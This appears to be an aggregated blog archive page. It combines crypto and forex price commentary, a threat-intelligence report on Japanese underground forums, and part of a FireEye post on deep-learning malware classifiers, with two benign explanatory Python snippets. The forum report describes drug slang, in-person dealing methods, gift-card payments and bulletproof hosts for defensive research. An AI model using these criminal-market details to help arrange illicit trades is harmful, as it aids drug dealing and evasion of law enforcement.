Category Archives: Analysis

Forex Update: Trump Pressures Fed Ahead of Rate Decision

Forex Market Snapshot

Asset           Current Value   Daily Change
EUR/USD         1.1355          0.46%
GBP/USD         1.2629          0.36%
USD/JPY         112.72          -0.57%
AUD/USD         0.7177          0.03%
GOLD            1,250           0.64%
WTI Crude Oil   49.99           -2.38%
BTC/USD         3,543           10.91%

The US Dollar has been at the center of attention again, as the last full trading week of the year started off in a […]

The post Forex Update: Trump Pressures Fed Ahead of Rate Decision appeared first on Hacked: Hacking Finance.

Pound Sterling Stems Decline

By Dmitriy Gurkovskiy, Chief Analyst at RoboMarkets On Monday morning, the British Pound stopped its significant decline against the USD, but it’s still pretty far from reaching stability. The British currency will remain under serious pressure until the country’s Parliament votes on the Brexit agreement with the European Union. We remind you that the voting […]

The post Pound Sterling Stems Decline appeared first on Hacked: Hacking Finance.

IOTA Price Analysis: MIOTA Has Made Encouraging Technical Progress

IOTA continues to expand and collaborate on new projects with other organizations. Bulls defy the odds to break out from a bearish technical set-up. Eyes on a recovery back towards pre-November drop levels. MIOTA price has gradually seen a renewed amount of bullish sentiment and is trading within its third consecutive session in the green. […]

The post IOTA Price Analysis: MIOTA Has Made Encouraging Technical Progress appeared first on Hacked: Hacking Finance.

Cardano Price Analysis: ADA Heading Higher Ahead of 1.4 Update

Charles Hoskinson confirmed via his Twitter account that the 1.4 update is scheduled for the 18th. ADA, against both USD and BTC, continues to move within a narrow range, subject to an imminent breakout. Cardano’s native token, ADA, continues to remain around depressed levels. Price action is moving within a narrow range, heading into the holiday season. This […]

The post Cardano Price Analysis: ADA Heading Higher Ahead of 1.4 Update appeared first on Hacked: Hacking Finance.

Tron Price Analysis: Fundamentals are Stronger than Ever; TRX Bulls Staging Comeback

The Tron network has passed 100 million transactions, as reported by Justin Sun. Zero transaction fees are anticipated on the Tron ecosystem by Friday the 21st. TRX/USD has remained generally soft since the 29th of November. The price has been cooling and ranging since its spike higher at the back end of November. TRX is remaining well […]

The post Tron Price Analysis: Fundamentals are Stronger than Ever; TRX Bulls Staging Comeback appeared first on Hacked: Hacking Finance.

Litecoin Price Analysis: LTC/USD Enjoys Double-Digit Gains as Lightning Network Seen Imminent

Litecoin has run higher by 20% over the past three sessions. The Litecoin community is very much excited about the upcoming activation of the Litecoin Lightning Network. The Litecoin price is currently enjoying a bull run, now in its third consecutive session in the green. LTC/USD having gained a whopping 20% to the upside […]

The post Litecoin Price Analysis: LTC/USD Enjoys Double-Digit Gains as Lightning Network Seen Imminent appeared first on Hacked: Hacking Finance.

XRP/USD Price Analysis: Israel’s Largest Financial Services Company GMT Partnering with Ripple

Ripple has another large financial firm leveraging its technology, as the list keeps on growing. XRP/USD will search for buyers within $0.3000-$0.2500 range initially, ahead of possible $0.2000 return. XRP/BTC looks surprisingly encouraging, subject to a potential breakout to the upside. XRP in line with the rest of its peers across the cryptocurrency market remains […]

The post XRP/USD Price Analysis: Israel’s Largest Financial Services Company GMT Partnering with Ripple appeared first on Hacked: Hacking Finance.

Stellar Price Analysis: XLM/USD Bears Break Big $0.10 Level

Fear and panic spreads as XLM takes out another big psychological level, $0.10. Support of XLM continues to take place, as AlphaPoint and CoinField announce support. Stellar’s native token XLM has been a real victim of this heavy market selling pressure. The downward trend is very much stubborn and showing lack of a shift in […]

The post Stellar Price Analysis: XLM/USD Bears Break Big $0.10 Level appeared first on Hacked: Hacking Finance.

Forex Update: Dismal Chinese Data Causes Turmoil in Markets

Forex Market Snapshot

Asset           Current Value   Daily Change
EUR/USD         1.1302          -0.47%
GBP/USD         1.2571          -0.68%
USD/JPY         113.35          -0.21%
AUD/USD         0.7179          -0.66%
GOLD            1,243           -0.20%
WTI Crude Oil   51.16           -3.18%
BTC/USD         3,180           -2.54%

We continue to have an unusually active December in traditional financial markets, as the recent bearish shift, the continued Brexit woes and the slowing […]

The post Forex Update: Dismal Chinese Data Causes Turmoil in Markets appeared first on Hacked: Hacking Finance.

XRP Trading Sideways as UAE Exchange Adopts Ripple for Overseas Payments

Ripple (XRP) is trading around $0.3030 on Friday, without any major changes, reports Dmitriy Gurkovskiy, Chief Analyst at RoboForex. The price tested the midterm descending channel resistance, and now is finishing its short term sideways correction. The XRP is trying to break out the local support, which would allow the price to go down to […]

The post XRP Trading Sideways as UAE Exchange Adopts Ripple for Overseas Payments appeared first on Hacked: Hacking Finance.

Crypto Update: Majors Testing Lows Following Broad Selloff

The major cryptocurrencies have been once again under pressure in the past 24 hours and most of the coins got very close to their recent lows, even as the losses are limited for now. While the top coins avoided a breakdown, given the overwhelmingly bearish long-term picture and the steep short-term trend, odds continue to […]

The post Crypto Update: Majors Testing Lows Following Broad Selloff appeared first on Hacked: Hacking Finance.

Monero Price Analysis: Wider Adoption Seen as Bity Adds XMR Support to Their ATM Network

Swiss-based cryptocurrency organization, Bity, has added their support for XMR for use at ATM terminals. XMR/USD trading up on Friday, with gains of over 3% at the time of writing. Despite this, weekly chart view still points to the downside. XMR/USD is trading in positive territory on Friday, having gained over 3% during the session. […]

The post Monero Price Analysis: Wider Adoption Seen as Bity Adds XMR Support to Their ATM Network appeared first on Hacked: Hacking Finance.

Ripple Update: Bulls Poised to End Bear Market

Ripple (XRP/USD) came to life on September 18, 2018 when it breached resistance of $0.30. This sparked an unexpected yet strong rally to $0.79132 on September 21. In a matter of three days, Ripple skyrocketed by over 160%. The price action can make it seem that bulls have finally taken over the market. Unfortunately, the […]

The post Ripple Update: Bulls Poised to End Bear Market appeared first on Hacked: Hacking Finance.

The Unfolding History of Japanese-Speaking Underground Communities

Insikt Group

Scope Note: Recorded Future collaborated with a Japanese security researcher with extensive knowledge in Japanese underground forums to explore the capabilities, cultures, and organization of Japanese hacking communities as a follow-up to Recorded Future’s previous piece on Chinese and Russian hacking communities. Sources the researcher used include direct forum access and actor engagement.

This report will be of greatest interest to organizations seeking to understand the Japanese-speaking criminal underground to better monitor industry and company-specific threats within the Japanese region, as well as to those investigating Japanese online criminal activity.

Executive Summary

Underground hacker communities have taken many forms, usually becoming an outlet for a country’s technologically educated to collaborate on projects and conduct business deals ranging from innocuous to illegal. It is no surprise then that Japan, as one of the most technologically developed countries in the world, would also have its own underground community. The Japanese underground consists of largely collaborative, anonymous forums, and a more aggressive cross-pollination between foreign and Japanese forum members than we have observed among their Chinese counterparts.

Key Judgments

  • Underground communities in Japan are relatively immature compared to their Chinese-, English-, or Russian-speaking counterparts. However, because interactions between Japanese hackers and their foreign counterparts are growing, Japanese hackers are likely to grow in number and sophistication in the future.
  • Illegal drug sales dominate Japanese underground content. Unlike English-speaking underground communities, no black market sites specifically for illicit content exist, and most sales threads are created on general-purpose forums or bulletin board systems (BBSes). Illegal drugs are sold by contacting an actor’s email within a sales thread and setting up an in-person meeting.
  • Unlike English, Russian, or other language communities, the adoption of Bitcoin as a form of online payment has been slow. Instead, prepaid gift cards, such as Amazon and iTunes gift cards, are used for payment.
  • A small portion of Japanese-speaking communities are formed inside sub-threads of English-speaking forums. Additionally, rather than using tools created themselves, Japanese hackers will often use external tools adopted by other hacking communities.

Background

Underground communities on the internet are prevalent in many languages and reside in a variety of forums. While some forums are hosted on websites easily searchable on the internet, some are also contained in mobile chat groups and even on websites hosted as Tor hidden services or on other overlay networks, which provide anonymity to internet connections. Sites advertising or discussing illegal content benefit from Tor’s anonymous nature. A variety of these websites, including bulletin board systems (BBSes), will use this anonymity to specialize in illicit sexual content, hacking, and malware, as well as illegal drug and firearms trades. These marketplaces serve as platforms for safer trades of illegal goods such as drugs, firearms, forged identification documents, and credit card information stolen by hackers in exchange for anonymous cryptocurrencies, including Bitcoin and Monero.

Most of the examples above are found in English-, Chinese-, or Russian-speaking communities, but the majority of Japanese-speaking underground communities are housed within general-purpose bulletin board systems — a series of message boards and forums in which information is exchanged in posts among members. While some bulletin board systems are Tor websites, many of them are sites on the clear web, readily accessible through a general-purpose internet browser.

The History of Japanese Underground Communities

The history of underground communities in Japan dates back to the late 1990s. In 1996, the BBS forum Ayashii Warudo (Suspicious World) was created. This series of message boards was the largest of its kind in Japan. It was particularly revolutionary to netizens at the time, created during a transition period in which Japanese netizens were moving from closed community networks to the present internet forums. The website consisted of a simple textboard with multiple posts and comments, as well as a separate page for “link collection,” in which similar websites were advertised. This format soon became the template for multiple groups of websites sharing the same culture and the same site designs. Although new sites continued to spring up in the 2010s, the advent of social media sites equipped with more sophisticated functions caused the number of posts on message boards to decline.

Textboard format example. (Source: Monafont Textboard)

In May 1999, an anonymous BBS called ni channeru (2channel) emerged with a catchphrase of “from hacking to what to cook for dinner,” where users could post about a broad range of topics. In 2017, 2channel changed its name to 5channel. It still remains one of the largest groups of message boards in Japan and served as the inspiration for the precursor of the American forum 4chan.

The 1990s represented the early days of the Japanese internet and, with only a limited number of users, accessing the Japanese internet itself made a user a part of the underground community. The internet communities listed above had developed their own culture, and there was a variety of categories of discussion available within these communities through message boards dedicated to different fields.

Hacker culture also led to the publication of books on hacking and the underground during this time, and Computer Aku No Manyuaru (Vicious Computer Manual) — published in March 1998 — sold over 100,000 copies. In July of that same year, “Hacker Japan” was launched and boasted the longest history among security periodicals in Japan until it was suspended in November 2013.

However, the internet does not operate in a vacuum. In 1999, the Act on Prohibition of Unauthorized Access, also known as the Unauthorized Computer Access Act, was enacted by the Japanese government. As internet access increased among the public and social media use began to rise, underground communities became less active.

Before the enactment of the Unauthorized Computer Access Act, a variety of illicit goods and services were casually exchanged in Japanese underground communities. Pirated goods, mainly in the form of pirated software (warez) and file-sharing software, were exchanged, in addition to pirated game ROMs and cheats. This was probably due to Japan’s low level of copyright enforcement in the late ‘90s and early 2000s. Hacking tools like phone phreaking technology, malware, and other cracking tools were also shared, along with small percentages of software reverse engineering tools. Many tools shared on Japanese forums around this time were originally developed by Japanese-speaking individuals. For example, Yoko Kuroki, a password analyzer released in January 2000 right before the Unauthorized Computer Access Act came into full effect, was developed by Japanese creators for a Japanese audience.

Yoko Kuroki interface. (Source: Reitaku University)

Information on illegal drugs, firearms and explosives, and illegal organizations (like the Aum Shinrikyo cult), as well as other gossip or cold cases censored by broadcast television were also widely shared on BBSes. Such information was mostly out of the ordinary in its nature, and appealed to audiences looking for shocking or morbid content. Sites that provided such information gained popularity in the early 2000s, eventually giving birth to Gekiura Joho (Extraordinary Information), a forum dealing in morbid gossip. However, many of these gossip or tabloid-related sites have since been closed down or have evolved into general forums.

Current Gekiura Joho homepage. (Source: https://gekiura.com/)

Current Landscape

Similar to their Chinese counterparts, Japanese forums largely do not compartmentalize wares into marketplaces, and instead advertise on general-purpose forums, where discussions around hacking or other topics also occur. Most current Japanese underground interactions occur on the Onion Channel, the largest Japanese-speaking underground community today. This BBS opened in 2004, inspired by the previously created 2channel forum. While the Onion Channel is officially divided into three message boards of “Tor Ita” (tor board), “Eroi No” (pornography), and “Angura Ita” (underground board), all of them contain various subforums, with topics including illegal drugs, hacking, and illicit sexual content. All message boards offer a file upload feature through which files related to illicit sexual content, censored information, and stolen files are uploaded. This board shows that the underground community culture of the 1990s and 2000s is still alive and well, wielding a strong influence over its modern counterparts today.

Tor board section of the Onion Channel.

Japanese-speaking underground communities constructed in the traditional BBS style allow anonymous posting with no account registration required, as opposed to English-speaking underground community forums that require sign-up. This site structure makes it difficult to eliminate spam posts and trolls, resulting in slow performance of these sites in general. Additionally, anonymity makes tracking actors on these sites incredibly difficult. For example, in August 2013, a large volume of membership information of 5channel Viewers, a paid service of the 5channel BBS, was leaked on the underground subsection of the Onion Channel. The media coverage of the incident made the Onion Channel widely known.

While many posts are anonymous, BBS sites like the Onion Channel are equipped with a function to allow users to enter a fixed handle name when posting a comment. To do so, the BBS requires a user to register through a “tripcode” system. This feature was adopted from 5channel. After a user enters a username and password, the BBS hashes the password to calculate an arbitrary string called a tripcode. This tripcode is then displayed in every post from the user alongside their username in the format “fixed handle name ◆ (tripcode).” If a password is accidentally leaked to the public domain, other individuals can spoof posts from the user by logging in with their account, as the tripcode remains the same after each login.
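The tripcode mechanism described above, as an added illustration (this is not the board's own code, and the hashing used here, truncated SHA-256 with a site salt, is a simplified stand-in for the DES-crypt-based scheme 2channel/5channel actually use; the "example-bbs" salt, the server secret and the handles are made up). It shows the two properties that matter to a reader: the tripcode is a pure function of the password, so any handle typed beside the same password produces the same identity mark, and a keyed variant is what stops the mark from being recomputed off-site from guessed passwords:

```python
import base64
import hashlib
import hmac

TRIP_LEN = 10  # classic tripcodes are short; the length here is chosen for the example


def tripcode(password: str, site_salt: str = "example-bbs") -> str:
    """Password-derived tripcode (simplified, not the real 2channel algorithm).
    Deterministic: the same password always yields the same string, and anyone
    holding the password reproduces it, which is why a leaked password lets a
    third party post under the user's identity mark."""
    digest = hashlib.sha256((site_salt + ":" + password).encode("utf-8")).digest()
    return base64.b64encode(digest).decode("ascii")[:TRIP_LEN]


def secure_tripcode(password: str, server_secret: bytes) -> str:
    """Keyed variant: a secret held only by the server is mixed in, so the code
    cannot be recomputed off-site by hashing candidate passwords. It does not
    help once the password itself has leaked; the server still accepts it."""
    mac = hmac.new(server_secret, password.encode("utf-8"), hashlib.sha256).digest()
    return base64.b64encode(mac).decode("ascii")[:TRIP_LEN]


def render_post(handle: str, password: str) -> str:
    """Display form used on the board: 'fixed handle name ◆tripcode'."""
    return f"{handle} ◆{tripcode(password)}"


def trip_of(post: str) -> str:
    """Extract the tripcode part of a rendered post header."""
    return post.split("◆", 1)[1]


def same_author(post_a: str, post_b: str) -> bool:
    """Readers trust the tripcode, not the handle: the handle is free text that
    anyone can type, while the tripcode requires knowledge of the password."""
    return trip_of(post_a) == trip_of(post_b)


if __name__ == "__main__":
    genuine = render_post("alice", "hunter2")          # constructed handle/password
    spoofed = render_post("mallory", "hunter2")        # same leaked password
    print(genuine, "|", spoofed, "| same author:", same_author(genuine, spoofed))
```

Because `same_author` compares only the tripcode, a post from a different handle but the same leaked password is indistinguishable from the genuine user, which is exactly the spoofing risk the paragraph describes; rotating the password changes the tripcode and therefore the identity.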

Other prominent Japanese underground forums include Kogarasu-maru and the now-unavailable Koushinkyo Cyber Division. Kogarasu-maru originally spun off from the Onion Channel and came to be used by Japanese hackers as a membership-only information sharing circle. Most Kogarasu-maru posts within this circle are related to hacking and maintaining anonymity online. Members will post on topics like “torrc settings optimization,” “how to improve anonymity with Whonix,” and “Kali Linux hacking tutorials.” Koushinkyo Cyber Division pages used to contain discussions mainly on hacking, carding, and anonymity among members.

Login section of Kogarasu-maru.

Unlike their Chinese counterparts, Japanese-speaking communities do not only rely on Japanese forums. In some cases, Japanese-speaking communities are formed inside subsections of English-speaking communities. Japanese hackers will also register accounts on non-Japanese message boards to gain information or access to services not readily accessible within domestic forums, like bulletproof hosting, which is more readily available on Russian- and English-language forums. Foreign communities will also occasionally flock to Japanese message boards to advertise online wares. There are also traces of posts made in non-fluent Japanese to advertise foreign message boards in Japanese-speaking communities.

Japanese forum post within a dark web community asking if anyone speaks an Asian language. (Source: Recorded Future)

As collaboration across Japanese and foreign forums has grown, preferred contact methods within the underground community in Japan have also begun to change. Until a few years ago, contact was made mainly through Yahoo Mail or disposable email addresses. However, the email services widely used among English-speaking communities, such as ProtonMail and Tutanota, have begun to grow in popularity. Messenger services that specialize in privacy protection, like Telegram, Signal Private Messenger, Wickr, or Jabber, are also becoming more popular.

Content in Japanese Underground Forums

Malware and Data

Malware development is not a common pursuit within Japanese-speaking communities, judging by how rarely malware development posts appear, but malware purchased or leaked from criminal communities overseas is actively sold. For example, ransomware originally created by a foreign actor will be co-opted by Japanese criminals, who write ransom notes in fluent Japanese to target Japanese hosts.

A BBS post advertising a CryptoLocker variant.

When it comes to data, Japanese hackers do not discriminate. Both domestic and international data is sold on Japanese underground forums, although in many cases it is not clear whether the data has been stolen by Japanese hackers themselves. For example, a May 2017 Japanese advertisement for Korean data was found on Kogarasu-maru, but seems to have been stolen by a hacker in a non-Japanese forum.

A Japanese ad on Kogarasu-maru selling a South Korean data dump.

Drugs, Weapons, and Illicit Sexual Content

The Japanese underground has a wide variety of drugs for sale, and drugs make up the majority of the posts. Just as it is in English, slang is often used in illegal drug and weapons trafficking in Japan. For example, on forum posts, cannabis is called “yasai,” and cocaine is called “chari,” while stimulant drugs are often referred to as “kori.” Additionally, weapons and illicit sexual content are occasionally advertised. Pistols, or “chaka,” are sometimes seen in forum advertisements on Japanese forums. Because all message boards offer a file upload feature and are anonymous by default, sellers can take advantage of this feature and share illicit content widely without fear of punishment.

In Japan, illegal drug sales are usually conducted in the form of an in-person transaction called “teoshi.” A seller will first post an advertising comment on a BBS such as “Osaka, Yasai, one gram, 5,000 yen,” with their contact information and will wait for buyers to send them an email. Buyers will contact the seller to meet at a specified location to conduct a transaction.

If sellers and buyers directly meet, they can complete transactions without leaving any evidence. Mail is discouraged as a form of drug transaction within Japan, both because some drug dealers have a habit of sending fake drugs, and because both domestic and international mail is screened before delivery. This is also why most drugs within the Japanese underground community are not ordered from other countries. Japanese customs is usually very effective at confiscating drugs and may directly visit the senders’ or buyers’ homes if the drugs were sent via mail. It is also understood among the users of English-speaking underground communities that no illegal drugs can be sent to Japan, and multiple drug-related English forums have discussed the efficacy of Japanese customs.

Reddit post of users warning other drug users not to ship to Japan because of Japanese customs.

Bulletproof Hosting Services and VPNs

Opening a website that hosts content usually censored by the Japanese government requires a server that is impervious to takedown requests, so bulletproof hosting services are used. Recently, international providers offering bulletproof hosting services have expanded their advertising presence within Japanese-language forums. Until a decade ago, services such as 000WebHost and XREA were used within Japan. Now, overseas services such as Novogara LTD, BlazingFast, and AbeloHost are commonly used by the country’s hackers. Information about these services is obtained by Japanese hackers through relationships with hacker peers overseas.

The use of VPNs within Japan has had a similar evolution. A free VPN service called VPN Gate, provided by the University of Tsukuba, had many users. Documents describing how to maintain anonymity in Tor and VPN Gate written in English and Japanese were widely circulated among forums. However, after it became widely known that the Japanese police archived VPN Gate logs, posts advertising overseas VPNs such as ExpressVPN and ProtonVPN gradually increased.

Payment Methods

Unlike English-speaking or other hacker communities, the adoption of Bitcoin as a form of online payment among Japanese hackers has been slow. While cash transactions are primarily used when buying drugs, prepaid gift cards, such as Amazon and iTunes gift cards, are usually used for online payment on Japanese forums. This is because they are convenient for netizens to obtain anonymously within Japan, while cryptocurrencies require the opening of an account and presentation of ID documents at the exchange in order to be converted into cash. Prepaid gift cards are also incredibly easy to use online, as the only data required to use gift cards is the code written on the back of the card. Thus, posts requesting prepaid cards occasionally appear on Japanese message boards.

Outlook

Underground communities in Japan largely adhere to the culture of their predecessors from the early 1990s. However, due to an increasing cross-pollination between Japanese and foreign hackers, Japanese hackers have an opportunity to grow in both number and sophistication. As many Japanese subsections continue to grow within English-speaking community forums, and as Japanese hackers develop relationships with foreign hackers, it is likely that Japanese hackers will continue to explore websites in other countries to obtain information and online goods not available in Japan, as they have done to obtain malware and VPN access. Message boards taking on the format of international forums will possibly emerge, and may begin to grow more influential and larger than the Onion Channel itself.

The post The Unfolding History of Japanese-Speaking Underground Communities appeared first on Recorded Future.


IOTA Price Analysis: Audi and IOTA Partnership Moving Strong; Price Behaviour Not Reflecting That

IOTA and Audi partnership is said to be progressing forward, according to Audi representative. Price action for IOTA remains tilted to the downside, and a bearish technical set up eyed. IOTA (MIOTA) price remains very much depressed, in line with current stubborn market conditions. It continues to trade around the lowest levels seen since July […]

The post IOTA Price Analysis: Audi and IOTA Partnership Moving Strong; Price Behaviour Not Reflecting That appeared first on Hacked: Hacking Finance.

Crypto Update: Bear Market Lows in Jeopardy After Latest Failed Bounce

The cryptocurrency segment switched directions yet again, as, after a weak bounce on Wednesday, the major coins are headed back towards their recent bear market lows today. While the losses are not significant, for now, given the bearish long-term picture and the vicinity of the lows, another leg lower in the downtrend could soon begin, […]

The post Crypto Update: Bear Market Lows in Jeopardy After Latest Failed Bounce appeared first on Hacked: Hacking Finance.

Binance Coin Price Analysis: BNB Still in Trouble Despite Recent Strong Fundamental Prospects

BNB/USDT moving within an ascending channel formation, subject to a breakout to the downside. There is much anticipation ahead of Binance’s DEX launch, expected in early 2019. Binance Coin (BNB) has made a decent recovery since being slammed in November and into the early part of December. The price had initially dropped a whopping 58%, […]

The post Binance Coin Price Analysis: BNB Still in Trouble Despite Recent Strong Fundamental Prospects appeared first on Hacked: Hacking Finance.

What are Deep Neural Networks Learning About Malware?

An increasing number of modern antivirus solutions rely on machine learning (ML) techniques to protect users from malware. While ML-based approaches, like FireEye Endpoint Security’s MalwareGuard capability, have done a great job at detecting new threats, they also come with substantial development costs. Creating and curating a large set of useful features takes significant amounts of time and expertise from malware analysts and data scientists (note that in this context a feature refers to a property or characteristic of the executable that can be used to distinguish between goodware and malware). In recent years, however, deep learning approaches have shown impressive results in automatically learning feature representations for complex problem domains, like images, speech, and text. Can we take advantage of these advances in deep learning to automatically learn how to detect malware without costly feature engineering?

As it turns out, deep learning architectures, and in particular convolutional neural networks (CNNs), can do a good job of detecting malware simply by looking at the raw bytes of Windows Portable Executable (PE) files. Over the last two years, FireEye has been experimenting with deep learning architectures for malware classification, as well as methods to evade them. Our experiments have demonstrated surprising levels of accuracy that are competitive with traditional ML-based solutions, while avoiding the costs of manual feature engineering. Since the initial presentation of our findings, other researchers have published similarly impressive results, with accuracy upwards of 96%.

Since these deep learning models are only looking at the raw bytes without any additional structural, semantic, or syntactic context, how can they possibly be learning what separates goodware from malware? In this blog post, we answer this question by analyzing FireEye’s deep learning-based malware classifier.

Highlights

  • FireEye’s deep learning classifier can successfully identify malware using only the unstructured bytes of the Windows PE file.
  • Import-based features, like names and function call fingerprints, play a significant role in the features learned across all levels of the classifier.
  • Unlike other deep learning application areas, where low-level features tend to generally capture properties across all classes, many of our low-level features focused on very specific sequences primarily found in malware.
  • End-to-end analysis of the classifier identified important features that closely mirror those created through manual feature engineering, which demonstrates the importance of classifier depth in capturing meaningful features.

Background

Before we dive into our analysis, let’s first discuss what a CNN classifier is doing with Windows PE file bytes. Figure 1 shows the high-level operations performed by the classifier while “learning” from the raw executable data. We start with the raw byte representation of the executable, absent any structure that might exist (1). This raw byte sequence is embedded into a high-dimensional space where each byte is replaced with an n-dimensional vector of values (2). This embedding step allows the CNN to learn relationships among the discrete bytes by moving them within the n-dimensional embedding space. For example, if the bytes 0xe0 and 0xe2 are used interchangeably, then the CNN can move those two bytes closer together in the embedding space so that the cost of replacing one with the other is small. Next, we perform convolutions over the embedded byte sequence (3). As we do this across our entire training set, our convolutional filters begin to learn the characteristics of certain sequences that differentiate goodware from malware (4). In simpler terms, we slide a fixed-length window across the embedded byte sequence and the convolutional filters learn the important features from across those windows. Once we have scanned the entire sequence, we can then pool the convolutional activations to select the best features from each section of the sequence (i.e., those that maximally activated the filters) to pass along to the next level (5). In practice, the convolution and pooling operations are used repeatedly in a hierarchical fashion to aggregate many low-level features into a smaller number of high-level features that are more useful for classification. Finally, we use the aggregated features from our pooling as input to a fully-connected neural network, which classifies the PE file sample as either goodware or malware (6).


Figure 1: High-level overview of a convolutional neural network applied to raw bytes from a Windows PE file.

The specific deep learning architecture that we analyze here actually has five convolutional and max pooling layers arranged in a hierarchical fashion, which allows it to learn complex features by combining those discovered at lower levels of the hierarchy. To efficiently train such a deep neural network, we must restrict our input sequences to a fixed length – truncating any bytes beyond this length or using special padding symbols to fill out smaller files. For this analysis, we chose an input length of 100KB, though we have experimented with lengths upwards of 1MB. We trained our CNN model on more than 15 million Windows PE files, 80% of which were goodware and the remainder malware. When evaluated against a test set of nearly 9 million PE files observed in the wild from June to August 2018, the classifier achieves an accuracy of 95.1% and an F1 score of 0.96, which are on the higher end of scores reported by previous work.
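To make steps (1) to (6) concrete, here is a toy forward pass through the embedding, first convolution and pooling stages. It is an added example written for this post, not FireEye's model code: the dimensions (8-wide embedding, 8-byte window, 4 filters) and the random weights are placeholders for the learned values, and the input length is a parameter so that the truncate-or-pad behavior described above can be exercised on small inputs. Besides the pooled value, it returns the offset at which each filter fired most strongly, which is the quantity the later analysis uses to decide which bytes to disassemble.

```python
import random

PAD = 256           # extra token for padding files shorter than the fixed length (257-entry vocabulary)
EMBED_DIM = 8       # "n" in the text; placeholder, the real model's width is not stated here
KERNEL = 8          # width of the window the first convolution slides over the sequence
FILTERS = 4         # placeholder count; the real first layer has 96 filters


def prepare_input(data: bytes, length: int) -> list:
    """Step (1): fixed-length token sequence. Bytes beyond `length` are truncated,
    shorter inputs are filled with the PAD token."""
    tokens = list(data[:length])
    return tokens + [PAD] * (length - len(tokens))


def init_weights(seed: int = 0):
    """Random stand-ins for the learned embedding table and first-layer filters."""
    rng = random.Random(seed)
    embedding = [[rng.uniform(-1, 1) for _ in range(EMBED_DIM)] for _ in range(257)]
    filters = [[[rng.uniform(-1, 1) for _ in range(EMBED_DIM)] for _ in range(KERNEL)]
               for _ in range(FILTERS)]
    return embedding, filters


def embed(tokens: list, embedding: list) -> list:
    """Step (2): replace each token with its n-dimensional vector."""
    return [embedding[t] for t in tokens]


def conv1d(vectors: list, filt: list) -> list:
    """Step (3): slide one filter over the embedded sequence; one activation per window start.
    The activation is the dot product of the window with the filter weights."""
    out = []
    for start in range(len(vectors) - KERNEL + 1):
        acc = 0.0
        for k in range(KERNEL):
            acc += sum(v * w for v, w in zip(vectors[start + k], filt[k]))
        out.append(acc)
    return out


def max_pool(activations: list) -> tuple:
    """Step (5): keep the strongest activation and remember the offset it fired at.
    Returns (value, window_start_offset)."""
    offset = max(range(len(activations)), key=activations.__getitem__)
    return activations[offset], offset


def first_layer_activations(data: bytes, length: int, seed: int = 0) -> list:
    """Run steps (1)-(5) for every filter; returns one (value, offset) pair per filter."""
    embedding, filters = init_weights(seed)
    vectors = embed(prepare_input(data, length), embedding)
    return [max_pool(conv1d(vectors, f)) for f in filters]


if __name__ == "__main__":
    # Constructed input: a repeated DOS-header-like prefix, padded out to 64 tokens.
    for i, (value, offset) in enumerate(first_layer_activations(b"MZ\x90\x00" * 8, 64)):
        print(f"filter {i}: strongest activation {value:+.3f} at offset {offset}")
```

With real weights the offsets returned by `max_pool` are exactly the file locations examined in the "Deciphering Low-Level Features" section; the real model stacks five such convolution-and-pooling layers before the fully connected classifier.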

In order to figure out what this classifier has learned about malware, we will examine each component of the architecture in turn. At each step, we use either a sample of 4,000 PE files taken from our training data to examine broad trends, or a smaller set of six artifacts from the NotPetya, WannaCry, and BadRabbit ransomware families to examine specific features.

Bytes in (Embedding) Space

The embedding space can encode interesting relationships that the classifier has learned about the individual bytes and reveal whether certain bytes are treated differently than others because of their implied importance to the classifier’s decision. To tease out these relationships, we will use two tools: (1) a dimensionality reduction technique called multi-dimensional scaling (MDS) and (2) a density-based clustering method called HDBSCAN. The dimensionality reduction technique allows us to move from the high-dimensional embedding space to an approximation in two-dimensional space that we can easily visualize, while still retaining the overall structure and organization of the points. Meanwhile, the clustering technique allows us to identify dense groups of points, as well as outliers that have no nearby points. The underlying intuition is that outliers are treated as “special” by the model, since there are no other points that can easily replace them without a significant change in upstream calculations, while dense clusters of points can be used interchangeably.


Figure 2: Visualization of the byte embedding space using multi-dimensional scaling (MDS) and clustered with hierarchical density-based clustering (HDBSCAN) with clusters (Left) and outliers labeled (Right).

On the left side of Figure 2, we show the two-dimensional representation of our byte embedding space with each of the clusters labeled, along with an outlier cluster labeled as -1. As you can see, the vast majority of bytes fall into one large catch-all class (Cluster 3), while the remaining three clusters have just two bytes each. Though there are no obvious semantic relationships in these clusters, the bytes that were included are interesting in their own right – for instance, Cluster 0 includes our special padding byte that is only used when files are smaller than the fixed-length cutoff, and Cluster 1 includes the ASCII character ‘r.’

What is more fascinating, however, is the set of outliers that the clustering produced, which are shown on the right side of Figure 2. Here, a number of intriguing trends start to appear. For one, each of the bytes in the range 0x0 to 0x6 is present, and these bytes are often used in short forward jumps or when registers are used as instruction arguments (e.g., eax, ebx, etc.). Interestingly, 0x7 and 0x8 are grouped together in Cluster 2, which may indicate that they are used interchangeably in our training data even though 0x7 could also be interpreted as a register argument. Another clear trend is the presence of several ASCII characters in the set of outliers, including ‘\n’, ‘A’, ‘e’, ‘s’, and ‘t.’ Finally, we see several opcodes present, including the call instruction (0xe8), loop and loopne (0xe0, 0xe2), and a breakpoint instruction (0xcc).

Given these findings, we immediately get a sense of what the classifier might be looking for in low-level features: ASCII text and usage of specific types of instructions.

Deciphering Low-Level Features

The next step in our analysis is to examine the low-level features learned by the first layer of convolutional filters. In our architecture, we used 96 convolutional filters at this layer, each of which learns basic building-block features that will be combined across the succeeding layers to derive useful high-level features. When one of these filters sees a byte pattern that it has learned in the current convolution, it will produce a large activation value and we can use that value as a method for identifying the most interesting bytes for each filter. Of course, since we are examining the raw byte sequences, this will merely tell us which file offsets to look at, and we still need to bridge the gap between the raw byte interpretation of the data and something that a human can understand. To do so, we parse the file using PEFile and apply BinaryNinja’s disassembler to executable sections to make it easier to identify common patterns among the learned features for each filter.

Since there are a large number of filters to examine, we can narrow our search by getting a broad sense of which filters have the strongest activations across our sample of 4,000 Windows PE files and where in those files those activations occur. In Figure 3, we show the locations of the 100 strongest activations across our 4,000-sample dataset. This shows a couple of interesting trends, some of which could be expected and others that are perhaps more surprising. For one, the majority of the activations at this level in our architecture occur in the ‘.text’ section, which typically contains executable code. When we compare the ‘.text’ section activations between malware and goodware subsets, there are significantly more activations for the malware set, meaning that even at this low level there appear to be certain filters that have keyed in on specific byte sequences primarily found in malware. Additionally, we see that the ‘UNKNOWN’ section – basically, any activation that occurs outside the valid bounds of the PE file – has many more activations in the malware group than in goodware. This makes some intuitive sense, since many obfuscation and evasion techniques rely on placing data in non-standard locations (e.g., embedding PE files within one another).


Figure 3: Distribution of low-level activation locations across PE file headers and sections. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right). UNKNOWN indicates an area outside the valid bounds of the file and NULL indicates an empty section name.

